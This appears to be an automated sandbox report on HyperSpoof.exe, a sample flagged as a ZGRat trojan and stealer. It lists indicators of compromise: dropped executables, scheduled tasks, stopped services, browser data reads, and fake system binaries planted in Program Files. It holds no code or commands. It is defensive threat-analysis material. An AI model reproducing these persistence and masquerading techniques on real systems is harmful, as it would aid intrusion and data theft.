Malware Analysis Report

2024-11-30 20:07

Sample ID 240509-bpy3mach69
Target HyperSpoof.exe
SHA256 71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e
Tags zgrat evasion execution persistence rat spyware stealer
Score 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score 10/10

SHA256 71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e

Threat Level: Known bad

The file HyperSpoof.exe was found to be: Known bad.

Malicious Activity Summary

zgrat evasion execution persistence rat spyware stealer

ZGRat

Detect ZGRat V1

Process spawned unexpected child process

Nirsoft

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Stops running service(s)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Creates new service(s)

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Maps connected drives based on registry

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Checks SCSI registry key(s)

Runs ping.exe

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 01:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 01:19

Reported

2024-05-09 01:21

Platform

win7-20240508-en

Max time kernel

70s

Max time network

70s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

ZGRat

rat zgrat

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.conhostsft.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A N/A N/A
N/A N/A C:\ProgramData\VC_redist.x64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\VC_redist.x64.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3024 set thread context of 604 N/A C:\ProgramData\VC_redist.x64.exe C:\Windows\system32\conhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\f3b6ecef712a24 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Windows Defender\fr-FR\lsass.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Windows Defender\fr-FR\6203df4a6bafc7 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.app.log C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90a7fb12afa1da01 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
